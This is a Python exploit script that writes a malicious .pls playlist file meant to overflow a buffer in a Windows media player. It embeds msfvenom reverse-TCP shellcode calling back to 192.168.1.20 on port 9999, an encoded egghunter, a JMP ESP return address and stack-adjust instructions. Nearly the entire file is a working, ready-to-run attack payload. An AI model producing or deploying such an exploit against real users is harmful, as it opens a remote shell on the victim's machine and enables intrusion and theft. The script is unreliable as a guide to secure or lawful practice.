import os #1072D0B7 ''' 0011FA94 83EC 58 SUB ESP,58 0011FA97 83EC 58 SUB ESP,58 0011FA9A FFE4 JMP ESP ''' #msfvenom -p windows/shell_reverse_tcp --platform windows -b '\x00\x0a\x0d\x2e' lhost=192.168.1.20 lport=9999 -f py -v shellcode -a x86 shellcode ="saibsaib" shellcode += "\x90"*20 shellcode += b"\xdd\xc0\xba\xb4\xb0\x62\x27\xd9\x74\x24\xf4" shellcode += b"\x5d\x29\xc9\xb1\x52\x31\x55\x17\x03\x55\x17" shellcode += b"\x83\x59\x4c\x80\xd2\x5d\x45\xc7\x1d\x9d\x96" shellcode += b"\xa8\x94\x78\xa7\xe8\xc3\x09\x98\xd8\x80\x5f" shellcode += b"\x15\x92\xc5\x4b\xae\xd6\xc1\x7c\x07\x5c\x34" shellcode += b"\xb3\x98\xcd\x04\xd2\x1a\x0c\x59\x34\x22\xdf" shellcode += b"\xac\x35\x63\x02\x5c\x67\x3c\x48\xf3\x97\x49" shellcode += b"\x04\xc8\x1c\x01\x88\x48\xc1\xd2\xab\x79\x54" shellcode += b"\x68\xf2\x59\x57\xbd\x8e\xd3\x4f\xa2\xab\xaa" shellcode += b"\xe4\x10\x47\x2d\x2c\x69\xa8\x82\x11\x45\x5b" shellcode += b"\xda\x56\x62\x84\xa9\xae\x90\x39\xaa\x75\xea" shellcode += b"\xe5\x3f\x6d\x4c\x6d\xe7\x49\x6c\xa2\x7e\x1a" shellcode += b"\x62\x0f\xf4\x44\x67\x8e\xd9\xff\x93\x1b\xdc" shellcode += b"\x2f\x12\x5f\xfb\xeb\x7e\x3b\x62\xaa\xda\xea" shellcode += b"\x9b\xac\x84\x53\x3e\xa7\x29\x87\x33\xea\x25" shellcode += b"\x64\x7e\x14\xb6\xe2\x09\x67\x84\xad\xa1\xef" shellcode += b"\xa4\x26\x6c\xe8\xcb\x1c\xc8\x66\x32\x9f\x29" shellcode += b"\xaf\xf1\xcb\x79\xc7\xd0\x73\x12\x17\xdc\xa1" shellcode += b"\xb5\x47\x72\x1a\x76\x37\x32\xca\x1e\x5d\xbd" shellcode += b"\x35\x3e\x5e\x17\x5e\xd5\xa5\xf0\xa1\x82\xa4" shellcode += b"\x14\x4a\xd1\xa6\x33\x85\x5c\x40\x51\x89\x08" shellcode += b"\xdb\xce\x30\x11\x97\x6f\xbc\x8f\xd2\xb0\x36" shellcode += b"\x3c\x23\x7e\xbf\x49\x37\x17\x4f\x04\x65\xbe" shellcode += b"\x50\xb2\x01\x5c\xc2\x59\xd1\x2b\xff\xf5\x86" shellcode += b"\x7c\x31\x0c\x42\x91\x68\xa6\x70\x68\xec\x81" shellcode += b"\x30\xb7\xcd\x0c\xb9\x3a\x69\x2b\xa9\x82\x72" shellcode += b"\x77\x9d\x5a\x25\x21\x4b\x1d\x9f\x83\x25\xf7" shellcode += b"\x4c\x4a\xa1\x8e\xbe\x4d\xb7\x8e\xea\x3b\x57" shellcode += b"\x3e\x43\x7a\x68\x8f\x03\x8a\x11\xed\xb3\x75" shellcode += b"\xc8\xb5\xc4\x3f\x50\x9f\x4c\xe6\x01\x9d\x10" shellcode += b"\x19\xfc\xe2\x2c\x9a\xf4\x9a\xca\x82\x7d\x9e" shellcode += b"\x97\x04\x6e\xd2\x88\xe0\x90\x41\xa8\x20" #msf-egghunter -e saib -p windows -a x86 -f raw | msfvenom --platform windows -a x86 -e x86/alpha_mixed -f py -v egghunter egghunter = b"" egghunter += b"\x89\xe1\xdb\xd3\xd9\x71\xf4\x5d\x55\x59\x49" egghunter += b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43" egghunter += b"\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50" egghunter += b"\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" egghunter += b"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38" egghunter += b"\x41\x42\x75\x4a\x49\x35\x36\x4f\x71\x49\x5a" egghunter += b"\x4b\x4f\x56\x6f\x73\x72\x62\x72\x53\x5a\x75" egghunter += b"\x52\x30\x58\x58\x4d\x44\x6e\x77\x4c\x55\x55" egghunter += b"\x32\x7a\x61\x64\x6a\x4f\x4d\x68\x52\x53\x45" egghunter += b"\x31\x51\x79\x75\x32\x6c\x49\x39\x47\x4e\x4f" egghunter += b"\x64\x35\x49\x7a\x6c\x6f\x71\x65\x48\x67\x6b" egghunter += b"\x4f\x49\x77\x41\x41" start="[playlist]\r\nFile1=\\\\" start2="\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n" payload = shellcode+"\x90" * (856-len(shellcode)) +"\x90" *(166-len(egghunter))+egghunter + "\xb7\xd0\x72\x10" + "\x83\xec\x58\x83\xec\x58\xff\xe4" + "\x90\x90\x90\x90" print len(payload) file= open(r'exploit.pls', 'w') file.write(start+payload+start2) file.close() print("\n files created!\n")